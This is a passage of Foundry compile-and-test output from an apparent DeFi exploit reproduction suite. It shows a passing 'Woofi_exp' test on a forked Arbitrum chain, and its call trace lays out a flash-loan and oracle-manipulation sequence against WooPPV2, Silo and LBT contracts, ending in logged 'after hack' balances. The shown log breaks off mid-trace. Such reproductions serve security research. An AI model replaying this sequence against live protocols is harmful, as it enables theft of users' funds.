Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.35s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
  --> src/test/2024-03/Woofi_exp.sol:90:5:
   |
90 |     IERC20 public constant WETH = IERC20(0x82aF49447D8a07e3bd95BD0d56f35241523fBab1);
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/Woofi_exp.sol:131:37:
    |
131 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
    |                                     ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/Woofi_exp.sol:131:71:
    |
131 |     function uniswapV3FlashCallback(uint256 amount0, uint256 amount1, bytes calldata data) external {
    |                                                                       ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
   --> src/test/2024-03/Woofi_exp.sol:132:9:
    |
132 |         uint256 weth_amount = WETH.balanceOf(address(this));
    |         ^^^^^^^^^^^^^^^^^^^

Warning (2072): Unused local variable.
   --> src/test/2024-03/Woofi_exp.sol:133:9:
    |
133 |         uint256 usdc_amount = USDCe.balanceOf(address(this));
    |         ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/Woofi_exp.sol:146:9:
    |
146 |         address sender,
    |         ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/Woofi_exp.sol:147:9:
    |
147 |         IERC20 tokenX,
    |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/Woofi_exp.sol:148:9:
    |
148 |         IERC20 tokenY,
    |         ^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/Woofi_exp.sol:149:9:
    |
149 |         bytes32 amounts,
    |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
   --> src/test/2024-03/Woofi_exp.sol:151:9:
    |
151 |         bytes calldata data
    |         ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 981.24ms (3.60ms CPU time)

Ran 1 test for src/test/2024-03/Woofi_exp.sol:Woofi_exp
[PASS] testExploit() (gas: 1274865)
Logs:
  USDCe after hack: 141603536376
  WOO after hack: 2549710367944099228835575
  WETH after hack: 522295261244159469020

Traces:
  [10158] Attacker::setUp()
    ├─ [0] VM::createSelectFork("arbitrum", 187381784 [1.873e8])
    │   └─ ← [Return] 0
    ├─ [0] VM::label(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], "USDCe")
    │   └─ ← [Return]
    ├─ [0] VM::label(WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1], "WETH")
    │   └─ ← [Return]
    ├─ [0] VM::label(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], "WOO")
    │   └─ ← [Return]
    ├─ [0] VM::label(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD], "LBT")
    │   └─ ← [Return]
    ├─ [0] VM::label(WooracleV2: [0x73504eaCB100c7576146618DC306c97454CB3620], "WooracleV2")
    │   └─ ← [Return]
    ├─ [0] VM::label(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], "Silo")
    │   └─ ← [Return]
    ├─ [0] VM::label(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443], "Univ3pool")
    │   └─ ← [Return]
    ├─ [0] VM::label(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], "WooPPV2")
    │   └─ ← [Return]
    ├─ [0] VM::label(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], "Attacker")
    │   └─ ← [Return]
    └─ ← [Stop]

  [1388065] Attacker::testExploit()
    ├─ [34702] WOO::approve(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [2337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   ├─ [24562] 0x3f770Ac673856F105b586bb393d122721265aD46::approve(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0949557952d7ca96514e3c050c855a2efa7ecae38fd12bec06ed0bc382387f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [25702] WOO::approve(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   ├─ [24562] 0x3f770Ac673856F105b586bb393d122721265aD46::approve(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9c754c9c914dd33bd112bbe305006bc159855f0bf942085ec535d5fb55c83e56: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [38439] USDCe::approve(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [31193] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::approve(WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: WooPPV2: [0xeFF23B4bE1091b53205E35f3AfCD9C7182bf3062], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x0949557952d7ca96514e3c050c855a2efa7ecae38fd12bec06ed0bc382387f00: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [27939] USDCe::approve(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   ├─ [27193] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::approve(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77]) [delegatecall]
    │   │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], value: 115792089237316195423570985008687907853269984665640564039457584007913129639935 [1.157e77])
    │   │   ├─  storage changes:
    │   │   │   @ 0x9c754c9c914dd33bd112bbe305006bc159855f0bf942085ec535d5fb55c83e56: 0 → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   └─ ← [Return] true
    │   └─ ← [Return] true
    ├─ [3296] USDCe::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [staticcall]
    │   ├─ [2553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [delegatecall]
    │   │   └─ ← [Return] 10586446576012 [1.058e13]
    │   └─ ← [Return] 10586446576012 [1.058e13]
    ├─ [1210694] Univ3pool::flash(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0, 10576446576012 [1.057e13], 0x00)
    │   ├─ [9796] WETH::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [staticcall]
    │   │   ├─ [2553] 0x8b194bEae1d3e0788A1a35173978001ACDFba668::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [delegatecall]
    │   │   │   └─ ← [Return] 432042397152000341752 [4.32e20]
    │   │   └─ ← [Return] 432042397152000341752 [4.32e20]
    │   ├─ [1296] USDCe::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [staticcall]
    │   │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443]) [delegatecall]
    │   │   │   └─ ← [Return] 10586446576012 [1.058e13]
    │   │   └─ ← [Return] 10586446576012 [1.058e13]
    │   ├─ [31397] USDCe::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10576446576012 [1.057e13])
    │   │   ├─ [30651] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 10576446576012 [1.057e13]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: Univ3pool: [0xC31E54c7a869B9FcBEcc14363CF510d1c41fa443], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 10576446576012 [1.057e13])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x585ee325f1af85f6f3fd85e4ae1c2cf3022b18f1e606c34894149ba54f0331cf: 0x000000000000000000000000000000000000000000000000000009a0d963398c → 0x00000000000000000000000000000000000000000000000000000002540be400
    │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0 → 0x0000000000000000000000000000000000000000000000000000099e8557558c
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [1140884] Attacker::uniswapV3FlashCallback(0, 5288223289 [5.288e9], 0x00)
    │   │   ├─ [3296] WETH::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [2553] 0x8b194bEae1d3e0788A1a35173978001ACDFba668::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 0
    │   │   │   └─ ← [Return] 0
    │   │   ├─ [1296] USDCe::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   ├─ [553] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [delegatecall]
    │   │   │   │   └─ ← [Return] 10576446576012 [1.057e13]
    │   │   │   └─ ← [Return] 10576446576012 [1.057e13]
    │   │   ├─ [3602] WOO::balanceOf(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD]) [staticcall]
    │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   ├─ [2465] 0x3f770Ac673856F105b586bb393d122721265aD46::balanceOf(LBT: [0xB87495219C432fc85161e4283DfF131692A528BD]) [delegatecall]
    │   │   │   │   └─ ← [Return] 2704558014737261187877837 [2.704e24]
    │   │   │   └─ ← [Return] 2704558014737261187877837 [2.704e24]
    │   │   ├─ [1097211] LBT::flashLoan(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x000000000000000000000000000000000000000000023cb6623e110c5808cb69, 0x000000000000000000000000000000000000000000023cb6623e110c5808cb690000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   ├─ [1094490] 0xee5A90098b270596Ec35D637b30d908C862c86df::flashLoan(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x000000000000000000000000000000000000000000023cb6623e110c5808cb69, 0x000000000000000000000000000000000000000000023cb6623e110c5808cb690000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   ├─ [2402] 0x8e42f2F4101563bF679975178e880FD87d3eFd4e::getFlashLoanFee() [staticcall]
    │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000048c27395000
    │   │   │   │   ├─ [29227] WOO::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2704558014737261187877737 [2.704e24])
    │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
    │   │   │   │   │   ├─ [28087] 0x3f770Ac673856F105b586bb393d122721265aD46::transfer(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 2704558014737261187877737 [2.704e24]) [delegatecall]
    │   │   │   │   │   │   ├─ emit Transfer(from: LBT: [0xB87495219C432fc85161e4283DfF131692A528BD], to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 2704558014737261187877737 [2.704e24])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x4ec4c5765dd102b25c7e93e63f27d3057d7661347ea5717c00c5d0dbc9555124: 0x000000000000000000000000000000000000000000023cb6623e110c5808cbcd → 100
    │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0 → 0x000000000000000000000000000000000000000000023cb6623e110c5808cb69
    │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [1020854] Attacker::LBFlashLoanCallback(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b], WETH: [0x82aF49447D8a07e3bd95BD0d56f35241523fBab1], 0x000000000000000000000000000000000000000000023cb6623e110c5808cb69, 0x000000000000000000000000000000000000000000000000bbaa99ecda402c94, 0x000000000000000000000000000000000000000000023cb6623e110c5808cb690000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   │   ├─ [259034] Silo::deposit(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], 7000000000000 [7e12], true)
    │   │   │   │   │   │   ├─ [7301] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::isSiloPaused(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000000
    │   │   │   │   │   │   ├─ [2872] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getInterestRateModel(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000374d79ef2a75d5d25a4ce163d85ab0b579171d6c
    │   │   │   │   │   │   ├─ [40794] 0x374D79ef2A75d5D25A4Ce163D85AB0b579171d6c::getCompoundInterestRateAndUpdate(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], 1709653326 [1.709e9])
    │   │   │   │   │   │   │   ├─ [5163] Silo::utilizationData(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000000000000000000000000000000000b79aa45c9c0000000000000000000000000000000000000000000000000000006e40194ac70000000000000000000000000000000000000000000000000000000065e73d18
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 0x7045703c86a0e25bb51bba3f0aaa89a8596fcd2bb0691144348fd50c0c64da7d: 0x00000000000000000000000000000000000000000000000000000000717d8d56 → 0x00000000000000000000000000000000000000000000000000000000717e5b83
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000000000017f0a76247
    │   │   │   │   │   │   ├─ [2439] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::protocolShareFee() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x00000000000000000000000000000000000000000000000003782dace9d90000
    │   │   │   │   │   │   ├─ [2579] 0xDa3abf6F119E2D573e9a56E9679c0f87D4547799::balanceOf(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [2349] 0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124::totalSupply() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0
    │   │   │   │   │   │   ├─ [56995] 0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124::mint(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7000000000000 [7e12])
    │   │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 7000000000000 [7e12])
    │   │   │   │   │   │   │   ├─ [305] Silo::siloRepository() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000008658047e48cc09161f4152c79155dac1d710ff0a
    │   │   │   │   │   │   │   ├─ [2642] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getNotificationReceiver(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x000000000000000000000000d592f705bdc8c1b439bd4d665ed99c4faad5a680
    │   │   │   │   │   │   │   ├─ [2767] 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680::onAfterTransfer(0xF1A6fa898964b0DE464b19f3496d9145Fc7C4124, 0x0000000000000000000000000000000000000000, Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 7000000000000 [7e12])
    │   │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   │   ├─ emit NotificationSent(param0: 0xd592F705bDC8C1B439Bd4D665Ed99C4FaAd5A680, param1: true)
    │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   @ 2: 0 → 0x0000000000000000000000000000000000000000000000000000065dd0837000
    │   │   │   │   │   │   │   │   @ 0x5ff10565516c110180bb9cc111cdbc2b0a68e09ff7fac17290373c3aa4a1bb03: 0 → 0x0000000000000000000000000000000000000000000000000000065dd0837000
    │   │   │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   │   │   ├─ [12463] USDCe::transferFrom(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 7000000000000 [7e12])
    │   │   │   │   │   │   │   ├─ [11711] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::transferFrom(Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], 7000000000000 [7e12]) [delegatecall]
    │   │   │   │   │   │   │   │   ├─ emit Transfer(from: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], value: 7000000000000 [7e12])
    │   │   │   │   │   │   │   │   ├─ emit Approval(owner: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], value: 115792089237316195423570985008687907853269984665640564039457584000913129639935 [1.157e77])
    │   │   │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   │   │   @ 0x4a118db3f320de5789eb241d5a09272e3d70541292a2d8e35e3916f8589e6a3e: 0x000000000000000000000000000000000000000000000000000000496bc64cdc → 0x000000000000000000000000000000000000000000000000000006a73c49bcdc
    │   │   │   │   │   │   │   │   │   @ 0xf85b56951f6ca259eb015e4162809ffc1dd28bc06ffa5a7aa716f2780313bdca: 0x0000000000000000000000000000000000000000000000000000099e8557558c → 0x00000000000000000000000000000000000000000000000000000340b4d3e58c
    │   │   │   │   │   │   │   │   │   @ 0x9c754c9c914dd33bd112bbe305006bc159855f0bf942085ec535d5fb55c83e56: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xfffffffffffffffffffffffffffffffffffffffffffffffffffff9a22f7c8fff
    │   │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   │   │   ├─ emit Deposit(param0: USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8], param1: Attacker: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], param2: 7000000000000 [7e12], param3: true)
    │   │   │   │   │   │   ├─ [2426] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::priceProvidersRepository() [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000005bf4e67127263d951fc515e23b323d0e3b4485fd
    │   │   │   │   │   │   ├─ [2718] 0x8658047e48CC09161f4152c79155Dac1d710Ff0a::getMaxSiloDepositsValue(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F], USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   └─ ← [Return] 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
    │   │   │   │   │   │   ├─ [3121] USDCe::decimals() [staticcall]
    │   │   │   │   │   │   │   ├─ [2381] 0x1eFB3f88Bc88f03FD1804A5C53b7141bbEf5dED8::decimals() [delegatecall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   │   └─ ← [Return] 6
    │   │   │   │   │   │   ├─ [51319] 0x5bf4E67127263D951FC515E23B323d0e3b4485fd::getPrice(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   ├─ [45606] 0x9d0DDE842801448534263FF23C629EDC6B6B31ee::getPrice(USDCe: [0xFF970A61A04b1cA14834A43f5dE4533eBDDB5CC8]) [staticcall]
    │   │   │   │   │   │   │   │   ├─ [15643] 0x50834F3163758fcC1Df9973b6e91f0F0F0434aD3::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [7410] 0x2946220288DbBF77dF0030fCecc2a8348CbBE32C::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 4688, 99997820 [9.999e7], 1709641592 [1.709e9], 1709641592 [1.709e9], 4688
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073709556304 [1.844e19], 99997820 [9.999e7], 1709641592 [1.709e9], 1709641592 [1.709e9], 18446744073709556304 [1.844e19]
    │   │   │   │   │   │   │   │   ├─ [15643] 0x639Fe6ab55C921f74e7fac1ee960C0B6293ba612::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   ├─ [7410] 0x3607e46698d218B3a5Cae44bF381475C0a5e2ca7::latestRoundData() [staticcall]
    │   │   │   │   │   │   │   │   │   │   └─ ← [Return] 531576 [5.315e5], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 531576 [5.315e5]
    │   │   │   │   │   │   │   │   │   └─ ← [Return] 18446744073710083192 [1.844e19], 380824500000 [3.808e11], 1709653291 [1.709e9], 1709653291 [1.709e9], 18446744073710083192 [1.844e19]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000eed13c0e2b8e
    │   │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000eed13c0e2b8e
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x07ddff65a6449960eba3c5b43a7b8542cee4c5d5210bf27263afd5489ef3c151: 0x0000000000000000000000000000000000000000000000010000000065e73d18 → 0x0000000000000000000000000000000000000000000000010000000065e73d4e
    │   │   │   │   │   │   │   @ 0xfae661be131f43b7bc6448d3c1746dcea928fc831564e55f46bb31af01f101a0: 0x000000000000000000000000000000000000000000000000000000b79aa45c9c → 0x000000000000000000000000000000000000000000000000000000b79aa4eb40
    │   │   │   │   │   │   │   @ 0xfae661be131f43b7bc6448d3c1746dcea928fc831564e55f46bb31af01f101a2: 0x0000000000000000000000000000000000000000000000000000006e40194ac7 → 0x0000000000000000000000000000000000000000000000000000006e401a08f7
    │   │   │   │   │   │   │   @ 0x07ddff65a6449960eba3c5b43a7b8542cee4c5d5210bf27263afd5489ef3c150: 0x000000000000000000000000000000000000000000000000000000002f31ed0e → 0x000000000000000000000000000000000000000000000000000000002f321c9a
    │   │   │   │   │   │   │   @ 0xfae661be131f43b7bc6448d3c1746dcea928fc831564e55f46bb31af01f101a1: 0 → 0x0000000000000000000000000000000000000000000000000000065dd0837000
    │   │   │   │   │   │   └─ ← [Return] 7000000000000 [7e12], 7000000000000 [7e12]
    │   │   │   │   │   ├─ [6662] Silo::liquidity(WOO: [0xcAFcD85D8ca7Ad1e1C6F82F651fA15E33AEfD07b]) [staticcall]
    │   │   │   │   │   │   ├─ [3602] WOO::balanceOf(Silo: [0x5C2B80214c1961dB06f69DD4128BcfFc6423d44F]) [staticcall]
    │   │   │   │   │   │   │   ├─ [337] 0xE72ba9418b5f2Ce0A6a40501Fe77c6839Aa37333::implementation() [staticcall]
    │   │   │   │   │   │   │   │   └─ ← [Return] 0x3f770Ac673856F105b586bb393d122721265aD46
